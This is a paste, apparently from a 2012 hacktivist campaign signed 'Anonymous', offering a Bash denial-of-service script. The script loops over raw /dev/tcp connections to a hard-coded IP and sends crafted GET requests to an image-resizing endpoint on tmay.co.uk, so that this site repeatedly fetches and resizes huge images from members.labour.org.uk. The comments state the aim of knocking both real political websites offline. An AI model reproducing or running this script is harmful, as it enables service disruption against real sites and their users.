Don't like ads? PRO users don't see any ads ;-)
Guest

#OpBritain - tmay.co.uk members.labour.org.uk DOS

By: a guest on Jun 4th, 2012  |  syntax: Bash  |  size: 0.48 KB  |  hits: 444  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #!/bin/bash
  2. for((i=0;i<1000;i++))
  3. do
  4. exec 3<>/dev/tcp/109.104.71.30/80;
  5. printf "GET /images/image.php?image=http://members.labour.org.uk/images/people/${i}/7000.jpg&width=6999&height=6999cache_dir=/dev/null HTTP/1.1\nHost: www.tmay.co.uk\n\n" >&3;
  6. done
  7. #This code will cause the tmay.co.uk website to send requests for, resize and reproduce
  8. #images from the labour website. Causing denial of service conditions for both.
  9. #Don't let it be said that we're partisan.
  10.  
  11. #- Anonymous